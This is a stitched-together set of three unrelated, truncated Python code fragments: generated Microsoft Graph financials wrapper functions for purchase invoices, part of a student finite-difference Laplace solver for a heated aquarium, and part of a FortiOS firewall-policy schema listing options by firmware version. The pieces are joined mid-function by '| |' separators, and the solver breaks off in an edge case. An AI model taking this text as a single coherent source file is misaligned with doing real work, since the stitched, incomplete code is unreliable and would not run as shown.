item_category_code=None,
item_category_id=None,
last_modified_date_time=None,
number=None,
price_includes_tax=None,
tax_group_code=None,
tax_group_id=None,
type_=None,
unit_cost=None,
unit_price=None,
item_category=None,
picture=None):
body = {}
body['id'] = id_
body['base_unit_of_measure_id'] = base_unit_of_measure_id
body['blocked'] = blocked
body['display_name'] = display_name
body['gtin'] = gtin
body['inventory'] = inventory
body['item_category_code'] = item_category_code
body['item_category_id'] = item_category_id
body['last_modified_date_time'] = last_modified_date_time
body['number'] = number
body['price_includes_tax'] = price_includes_tax
body['tax_group_code'] = tax_group_code
body['tax_group_id'] = tax_group_id
body['type'] = type_
body['unit_cost'] = unit_cost
body['unit_price'] = unit_price
body['item_category'] = item_category
body['picture'] = picture
return client.update_item(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
body=body)
def financials_financial_company_purchase_invoice_line_item_create_picture(client,
company_id,
purchase_invoice_line_id,
content_type,
id_=None,
content=None,
height=None,
width=None):
body = {}
body['id'] = id_
body['content'] = content
body['content_type'] = content_type
body['height'] = height
body['width'] = width
return client.create_picture(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
body=body)
def financials_financial_company_purchase_invoice_line_item_delete_item_category(client,
company_id,
purchase_invoice_line_id,
if_match=None):
return client.delete_item_category(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
if_match=if_match)
def financials_financial_company_purchase_invoice_line_item_delete_picture(client,
company_id,
purchase_invoice_line_id,
picture_id,
if_match=None):
return client.delete_picture(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
picture_id=picture_id,
if_match=if_match)
def financials_financial_company_purchase_invoice_line_item_list_picture(client,
company_id,
purchase_invoice_line_id,
orderby=None,
select=None,
expand=None):
return client.list_picture(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
orderby=orderby,
select=select,
expand=expand)
def financials_financial_company_purchase_invoice_line_item_set_picture_content(client,
company_id,
purchase_invoice_line_id,
picture_id,
data):
return client.set_picture_content(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
picture_id=picture_id,
data=data)
def financials_financial_company_purchase_invoice_line_item_show_item_category(client,
company_id,
purchase_invoice_line_id,
select=None,
expand=None):
return client.get_item_category(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
select=select,
expand=expand)
def financials_financial_company_purchase_invoice_line_item_show_picture(client,
company_id,
purchase_invoice_line_id,
picture_id,
select=None,
expand=None):
return client.get_picture(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
picture_id=picture_id,
select=select,
expand=expand)
def financials_financial_company_purchase_invoice_line_item_show_picture_content(client,
company_id,
purchase_invoice_line_id,
picture_id):
return client.get_picture_content(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
picture_id=picture_id)
def financials_financial_company_purchase_invoice_line_item_update_item_category(client,
company_id,
purchase_invoice_line_id,
id_=None,
code=None,
display_name=None,
last_modified_date_time=None):
body = {}
body['id'] = id_
body['code'] = code
body['display_name'] = display_name
body['last_modified_date_time'] = last_modified_date_time
return client.update_item_category(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
body=body)
def financials_financial_company_purchase_invoice_line_item_update_picture(client,
company_id,
purchase_invoice_line_id,
picture_id,
content_type,
id_=None,
content=None,
height=None,
width=None):
body = {}
body['id'] = id_
body['content'] = content
body['content_type'] = content_type
body['height'] = height
body['width'] = width
return client.update_picture(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
picture_id=picture_id,
body=body)
def financials_financial_company_purchase_invoice_create_purchase_invoice_line(client,
company_id,
purchase_invoice_id,
id_=None,
account_id=None,
amount_excluding_tax=None,
amount_including_tax=None,
description=None,
discount_amount=None,
discount_applied_before_tax=None,
discount_percent=None,
document_id=None,
expected_receipt_date=None,
invoice_discount_allocation=None,
item_id=None,
line_type=None,
net_amount=None,
net_amount_including_tax=None,
net_tax_amount=None,
quantity=None,
sequence=None,
tax_code=None,
tax_percent=None,
total_tax_amount=None,
unit_cost=None,
account=None,
microsoft_graph_entity_id=None,
base_unit_of_measure_id=None,
blocked=None,
display_name=None,
gtin=None,
inventory=None,
item_category_code=None,
item_category_id=None,
last_modified_date_time=None,
number=None,
price_includes_tax=None,
tax_group_code=None,
tax_group_id=None,
type_=None,
number_unit_cost=None,
unit_price=None,
item_category=None,
picture=None):
body = {}
body['id'] = id_
body['account_id'] = account_id
body['amount_excluding_tax'] = amount_excluding_tax
body['amount_including_tax'] = amount_including_tax
body['description'] = description
body['discount_amount'] = discount_amount
body['discount_applied_before_tax'] = discount_applied_before_tax
body['discount_percent'] = discount_percent
body['document_id'] = document_id
body['expected_receipt_date'] = expected_receipt_date
body['invoice_discount_allocation'] = invoice_discount_allocation
body['item_id'] = item_id
body['line_type'] = line_type
body['net_amount'] = net_amount
body['net_amount_including_tax'] = net_amount_including_tax
body['net_tax_amount'] = net_tax_amount
body['quantity'] = quantity
body['sequence'] = sequence
body['tax_code'] = tax_code
body['tax_percent'] = tax_percent
body['total_tax_amount'] = total_tax_amount
body['unit_cost'] = unit_cost
body['account'] = account
body['item'] = {}
body['item']['id'] = microsoft_graph_entity_id
body['item']['base_unit_of_measure_id'] = base_unit_of_measure_id
body['item']['blocked'] = blocked
body['item']['display_name'] = display_name
body['item']['gtin'] = gtin
body['item']['inventory'] = inventory
body['item']['item_category_code'] = item_category_code
body['item']['item_category_id'] = item_category_id
body['item']['last_modified_date_time'] = last_modified_date_time
body['item']['number'] = number
body['item']['price_includes_tax'] = price_includes_tax
body['item']['tax_group_code'] = tax_group_code
body['item']['tax_group_id'] = tax_group_id
body['item']['type'] = type_
body['item']['unit_cost'] = number_unit_cost
body['item']['unit_price'] = unit_price
body['item']['item_category'] = item_category
body['item']['picture'] = picture
return client.create_purchase_invoice_lines(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
body=body)
def financials_financial_company_purchase_invoice_delete_currency(client,
company_id,
purchase_invoice_id,
if_match=None):
return client.delete_currency(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
if_match=if_match)
def financials_financial_company_purchase_invoice_delete_purchase_invoice_line(client,
company_id,
purchase_invoice_id,
purchase_invoice_line_id,
if_match=None):
return client.delete_purchase_invoice_lines(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
purchase_invoice_line_id=purchase_invoice_line_id,
if_match=if_match)
def financials_financial_company_purchase_invoice_delete_vendor(client,
company_id,
purchase_invoice_id,
if_match=None):
return client.delete_vendor(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
if_match=if_match)
def financials_financial_company_purchase_invoice_list_purchase_invoice_line(client,
company_id,
purchase_invoice_id,
orderby=None,
select=None,
expand=None):
return client.list_purchase_invoice_lines(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
orderby=orderby,
select=select,
expand=expand)
def financials_financial_company_purchase_invoice_post(client,
company_id,
purchase_invoice_id):
return client.post(company_id=company_id,
purchase_invoice_id=purchase_invoice_id)
def financials_financial_company_purchase_invoice_show_currency(client,
company_id,
purchase_invoice_id,
select=None,
expand=None):
return client.get_currency(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
select=select,
expand=expand)
def financials_financial_company_purchase_invoice_show_purchase_invoice_line(client,
company_id,
purchase_invoice_id,
purchase_invoice_line_id,
select=None,
expand=None):
return client.get_purchase_invoice_lines(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
purchase_invoice_line_id=purchase_invoice_line_id,
select=select,
expand=expand)
def financials_financial_company_purchase_invoice_show_vendor(client,
company_id,
purchase_invoice_id,
select=None,
expand=None):
return client.get_vendor(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
select=select,
expand=expand)
def financials_financial_company_purchase_invoice_update_currency(client,
company_id,
purchase_invoice_id,
id_=None,
amount_decimal_places=None,
amount_rounding_precision=None,
code=None,
display_name=None,
last_modified_date_time=None,
symbol=None):
body = {}
body['id'] = id_
body['amount_decimal_places'] = amount_decimal_places
body['amount_rounding_precision'] = amount_rounding_precision
body['code'] = code
body['display_name'] = display_name
body['last_modified_date_time'] = last_modified_date_time
body['symbol'] = symbol
return client.update_currency(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
body=body)
def financials_financial_company_purchase_invoice_update_purchase_invoice_line(client,
company_id,
purchase_invoice_id,
purchase_invoice_line_id,
id_=None,
account_id=None,
amount_excluding_tax=None,
amount_including_tax=None,
description=None,
discount_amount=None,
discount_applied_before_tax=None,
discount_percent=None,
document_id=None,
expected_receipt_date=None,
invoice_discount_allocation=None,
item_id=None,
line_type=None,
net_amount=None,
net_amount_including_tax=None,
net_tax_amount=None,
quantity=None,
sequence=None,
tax_code=None,
tax_percent=None,
total_tax_amount=None,
unit_cost=None,
account=None,
microsoft_graph_entity_id=None,
base_unit_of_measure_id=None,
blocked=None,
display_name=None,
gtin=None,
inventory=None,
item_category_code=None,
item_category_id=None,
last_modified_date_time=None,
number=None,
price_includes_tax=None,
tax_group_code=None,
tax_group_id=None,
type_=None,
number_unit_cost=None,
unit_price=None,
item_category=None,
picture=None):
body = {}
body['id'] = id_
body['account_id'] = account_id
body['amount_excluding_tax'] = amount_excluding_tax
body['amount_including_tax'] = amount_including_tax
body['description'] = description
body['discount_amount'] = discount_amount
body['discount_applied_before_tax'] = discount_applied_before_tax
body['discount_percent'] = discount_percent
body['document_id'] = document_id
body['expected_receipt_date'] = expected_receipt_date
body['invoice_discount_allocation'] = invoice_discount_allocation
body['item_id'] = item_id
body['line_type'] = line_type
body['net_amount'] = net_amount
body['net_amount_including_tax'] = net_amount_including_tax
body['net_tax_amount'] = net_tax_amount
body['quantity'] = quantity
body['sequence'] = sequence
body['tax_code'] = tax_code
body['tax_percent'] = tax_percent
body['total_tax_amount'] = total_tax_amount
body['unit_cost'] = unit_cost
body['account'] = account
body['item'] = {}
body['item']['id'] = microsoft_graph_entity_id
body['item']['base_unit_of_measure_id'] = base_unit_of_measure_id
body['item']['blocked'] = blocked
body['item']['display_name'] = display_name
body['item']['gtin'] = gtin
body['item']['inventory'] = inventory
body['item']['item_category_code'] = item_category_code
body['item']['item_category_id'] = item_category_id
body['item']['last_modified_date_time'] = last_modified_date_time
body['item']['number'] = number
body['item']['price_includes_tax'] = price_includes_tax
body['item']['tax_group_code'] = tax_group_code
body['item']['tax_group_id'] = tax_group_id
body['item']['type'] = type_
body['item']['unit_cost'] = number_unit_cost
body['item']['unit_price'] = unit_price
body['item']['item_category'] = item_category
body['item']['picture'] = picture
return client.update_purchase_invoice_lines(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
purchase_invoice_line_id=purchase_invoice_line_id,
body=body)
def financials_financial_company_purchase_invoice_update_vendor(client,
company_id,
purchase_invoice_id,
id_=None,
address=None,
balance=None,
blocked=None,
currency_code=None,
currency_id=None,
display_name=None,
email=None,
last_modified_date_time=None,
number=None,
payment_method_id=None,
payment_terms_id=None,
phone_number=None,
tax_liable=None,
tax_registration_number=None,
website=None,
currency=None,
payment_method=None,
payment_term=None,
picture=None):
body = {}
body['id'] = id_
body['address'] = address
body['balance'] = balance
body['blocked'] = blocked
body['currency_code'] = currency_code
body['currency_id'] = currency_id
body['display_name'] = display_name
body['email'] = email
body['last_modified_date_time'] = last_modified_date_time
body['number'] = number
body['payment_method_id'] = payment_method_id
body['payment_terms_id'] = payment_terms_id
body['phone_number'] = phone_number
body['tax_liable'] = tax_liable
body['tax_registration_number'] = tax_registration_number
body['website'] = website
body['currency'] = currency
body['payment_method'] = payment_method
body['payment_term'] = payment_term
body['picture'] = picture
return client.update_vendor(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
body=body)
def financials_financial_company_purchase_invoice_purchase_invoice_line_delete_account(client,
company_id,
purchase_invoice_id,
purchase_invoice_line_id,
if_match=None):
return client.delete_account(company_id=company_id,
purchase_invoice_id=purchase_invoice_id,
| |
<reponame>salistito/Computer-Graphics
# coding=utf-8
"""
<NAME>, CC3501-Tarea3a, 2020-1
Finite Differences for Partial Differential Equations
Solving the Laplace equation in 3D with Dirichlet and
Neumann border conditions over a parallelepiped domain.
"""
import numpy as np
import sys
import json_reader as r
import scipy.sparse as sparse
import scipy.sparse.linalg as linalg
import matplotlib.pyplot as plt
# Input
problem_setup_name = sys.argv[1] # Problem setup file
problem_setup_dict = r.jsonToDict(problem_setup_name) # Dictonary for the problem setup constants
# Problem setup
H = problem_setup_dict["height"]
W = problem_setup_dict["width"]
L = problem_setup_dict["lenght"]
# Paso de discretización
h = 0.1 # 0.125
# Neumann conditions:
F = problem_setup_dict["window_loss"] #at right, left, far and near
# Boundary Dirichlet Conditions:
heater_a = problem_setup_dict["heater_a"]
heater_b = problem_setup_dict["heater_b"]
T = problem_setup_dict["ambient_temperature"]
fileName = problem_setup_dict["filename"]
# Path
path = "Solutions/"
# Number of unknowns
# Only the top side and the heaters at the bottom are known (Dirichlet condition)
# right, left, far and near are unknown (Neumann condition)
nx = int(W / h) + 1
ny = int(L / h) + 1
nz = int(H / h)
# In this case, the domain is an aquarium with parallelepiped form
N = nx * ny * nz
# We define a function to convert the indices from i,j,k to P and viceversa
# i,j,k indexes the discrete domain in 3D.
# P parametrize those i,j,k this way we can tidy the unknowns
# in a column vector and use the standard algebra
def getP(i,j,k):
return k*(nx*ny) + j*nx + i
def getIJK(P):
k = P // (nx*ny)
i = P % nx
j = (P // nx) -k*ny
return (i, j, k)
"""
# This code is useful to debug the indexation functions above
print("="*10)
print(getP(0,0,0), getIJK(0))
print(getP(30,50,0), getIJK(1580))
print(getP(30,50,1), getIJK(3161))
print(getP(0,0,2), getIJK(3162))
print("="*10)
import sys
sys.exit(0)
"""
# In this matrix we will write all the coefficients of the unknowns
#A = np.zeros((N,N))
A = sparse.lil_matrix((N,N)) # We use a sparse matrix in order to spare memory, since it has many 0's
# In this vector we will write all the right side of the equations
b = np.zeros((N,))
# Note: To write an equation is equivalent to write a row in the matrix system
# We iterate over each point inside the domain
# Each point has an equation associated
# The equation is different depending on the point location inside the domain
for k in range(0, nz):
for j in range(0, ny):
for i in range(0, nx):
# We will write the equation associated with row P
P = getP(i, j, k)
# We obtain indices of the other coefficients
P_right = getP(i+1, j, k)
P_left = getP(i-1, j, k)
P_far = getP(i, j+1, k)
P_near = getP(i, j-1, k)
P_up = getP(i, j, k+1)
P_down = getP(i, j, k-1)
# Depending on the location of the point, the equation is different:
# Interior
if (1 <= i) and (i <= nx - 2) and (1 <= j) and (j <= ny - 2) and (1 <= k) and (k <= nz-2):
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(1))
A[P, P_right] = 1
A[P, P_left] = 1
A[P, P_far] = 1
A[P, P_near] = 1
A[P, P_up] = 1
A[P, P_down] = 1
A[P, P] = -6
b[P] = 0
# Right
elif i == nx-1 and (1 <= j) and (j <= ny - 2) and (1 <= k) and (k <= nz-2):
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(2))
A[P, P_left] = 2
A[P, P_far] = 1
A[P, P_near] = 1
A[P, P_up] = 1
A[P, P_down] = 1
A[P, P] = -6
b[P] = -2 * h * F
# Left
elif i == 0 and (1 <= j) and (j <= ny - 2) and (1 <= k) and (k <= nz-2):
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(3))
A[P, P_right] = 2
A[P, P_far] = 1
A[P, P_near] = 1
A[P, P_up] = 1
A[P, P_down] = 1
A[P, P] = -6
b[P] = -2 * h * F
# Far
elif (1 <= i) and (i <= nx-2) and j == ny-1 and (1 <= k) and (k <= nz-2):
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(4))
A[P, P_right] = 1
A[P, P_left] = 1
A[P, P_near] = 2
A[P, P_up] = 1
A[P, P_down] = 1
A[P, P] = -6
b[P] = -2 * h * F
# Near
elif (1 <= i) and (i <= nx-2) and j == 0 and (1 <= k) and (k <= nz-2):
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(5))
A[P, P_right] = 1
A[P, P_left] = 1
A[P, P_far] = 2
A[P, P_up] = 1
A[P, P_down] = 1
A[P, P] = -6
b[P] = -2 * h * F
# Top
elif (1 <= i) and (i <= nx - 2) and (1 <= j) and (j <= ny-2) and k == nz-1:
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(6))
A[P, P_right] = 1
A[P, P_left] = 1
A[P, P_far] = 1
A[P, P_near] = 1
A[P, P_down] = 1
A[P, P] = -6
b[P] = -T
# heater_a
elif (nx//3 <= i) and (i <= 2*nx//3) and (3*ny//5 <= j) and (j <= 4*ny//5) and k == 0:
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(8))
A[P, P_right] = 0
A[P, P_left] = 0
A[P, P_far] = 0
A[P, P_near] = 0
A[P, P_up] = 0
A[P, P] = 1
b[P] = heater_a
# heater_b
elif (nx//3 <= i) and (i <= 2*nx//3) and (ny//5 <= j) and (j <= 2*ny//5) and k == 0:
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(9))
A[P, P_right] = 0
A[P, P_left] = 0
A[P, P_far] = 0
A[P, P_near] = 0
A[P, P_up] = 0
A[P, P] = 1
b[P] = heater_b
# Bottom
elif (1 <= i) and (i <= nx - 2) and (1 <= j) and (j <= ny-2) and k == 0:
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(7))
A[P, P_right] = 1
A[P, P_left] = 1
A[P, P_far] = 1
A[P, P_near] = 1
A[P, P_up] = 2
A[P, P] = -6
b[P] = 0
#---------------------------------------------------------------------------------------------------
# Edges:
# Right bottom
elif i == nx-1 and (1 <= j) and (j <= ny - 2) and k == 0:
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(10))
A[P, P_left] = 2
A[P, P_far] = 1
A[P, P_near] = 1
A[P, P_up] = 2
A[P, P] = -6
b[P] = -2 * h * F
# Left bottom
elif i == 0 and (1 <= j) and (j <= ny - 2) and k == 0:
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(11))
A[P, P_right] = 2
A[P, P_far] = 1
A[P, P_near] = 1
A[P, P_up] = 2
A[P, P] = -6
b[P] = -2 * h * F
# Far bottom
elif (1 <= i) and (i <= nx-2) and j == ny-1 and k == 0:
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(12))
A[P, P_right] = 1
A[P, P_left] = 1
A[P, P_near] = 2
A[P, P_up] = 2
A[P, P] = -6
b[P] = -2 * h * F
# Near bottom
elif (1 <= i) and (i <= nx-2) and j == 0 and k == 0:
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(13))
A[P, P_right] = 1
A[P, P_left] = 1
A[P, P_far] = 2
A[P, P_up] = 2
A[P, P] = -6
b[P] = -2 * h * F
# Right far
elif i == nx-1 and j == ny-1 and (1 <= k) and (k <= nz-2):
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(14))
A[P, P_left] = 2
A[P, P_near] = 2
A[P, P_up] = 1
A[P, P_down] = 1
A[P, P] = -6
b[P] = -4 * h * F
# Left far
elif i == 0 and j == ny-1 and (1 <= k) and (k <= nz-2):
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(15))
A[P, P_right] = 2
A[P, P_near] = 2
A[P, P_up] = 1
A[P, P_down] = 1
A[P, P] = -6
b[P] = -4 * h * F
# Right near
elif i == nx-1 and j == 0 and (1 <= k) and (k <= nz-2):
#print("(",str(i)," ",str(j), " ",str(k),")"," ",str(16))
A[P, P_left] = | |
True,
"v6.0.11": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"name": {
"type": "string",
"revisions": {
"v6.4.4": True,
"v7.0.0": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": False
}
},
"sctp_filter_profile": {
"type": "string",
"revisions": {
"v7.0.1": True
}
},
"scan_botnet_connections": {
"type": "string",
"options": [
{
"value": "disable",
"revisions": {
"v6.0.11": True,
"v6.0.0": True,
"v6.0.5": True
}
},
{
"value": "block",
"revisions": {
"v6.0.11": True,
"v6.0.0": True,
"v6.0.5": True
}
},
{
"value": "monitor",
"revisions": {
"v6.0.11": True,
"v6.0.0": True,
"v6.0.5": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": False,
"v6.0.5": True,
"v6.4.4": False,
"v7.0.1": False,
"v6.4.0": False,
"v6.4.1": False,
"v6.2.0": False,
"v6.2.3": False,
"v6.2.5": False,
"v6.2.7": False,
"v6.0.11": True
}
},
"internet_service_id": {
"type": "list",
"children": {
"id": {
"type": "integer",
"revisions": {
"v6.0.0": True,
"v6.0.5": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
},
"revisions": {
"v6.0.0": True,
"v7.0.0": False,
"v6.0.5": True,
"v6.4.4": False,
"v7.0.1": False,
"v6.4.0": False,
"v6.4.1": False,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"dstaddr_negate": {
"type": "string",
"options": [
{
"value": "enable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "disable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"webcache_https": {
"type": "string",
"options": [
{
"value": "disable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "enable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"ips_sensor": {
"type": "string",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"ztna_ems_tag": {
"type": "list",
"children": {
"name": {
"type": "string",
"revisions": {
"v7.0.1": True,
"v7.0.0": True
}
}
},
"revisions": {
"v7.0.1": True,
"v7.0.0": True
}
},
"ssh_policy_redirect": {
"type": "string",
"options": [
{
"value": "enable",
"revisions": {
"v7.0.1": True,
"v7.0.0": True,
"v6.4.4": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True
}
},
{
"value": "disable",
"revisions": {
"v7.0.1": True,
"v7.0.0": True,
"v6.4.4": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True
}
}
],
"revisions": {
"v7.0.1": True,
"v7.0.0": True,
"v6.4.4": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True
}
},
"internet_service_name": {
"type": "list",
"children": {
"name": {
"type": "string",
"revisions": {
"v6.4.4": True,
"v7.0.0": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True
}
}
},
"revisions": {
"v6.4.4": True,
"v7.0.0": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True
}
},
"internet_service_group": {
"type": "list",
"children": {
"name": {
"type": "string",
"revisions": {
"v7.0.1": True,
"v7.0.0": True,
"v6.4.4": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True
}
}
},
"revisions": {
"v7.0.1": True,
"v7.0.0": True,
"v6.4.4": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True
}
},
"internet_service": {
"type": "string",
"options": [
{
"value": "enable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "disable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"action": {
"type": "string",
"options": [
{
"value": "accept",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "deny",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "redirect",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"webcache": {
"type": "string",
"options": [
{
"value": "enable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "disable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
],
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"replacemsg_override_group": {
"type": "string",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"profile_protocol_options": {
"type": "string",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
"logtraffic": {
"type": "string",
"options": [
{
"value": "all",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "utm",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
},
{
"value": "disable",
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
],
"revisions": {
"v6.0.0": True,
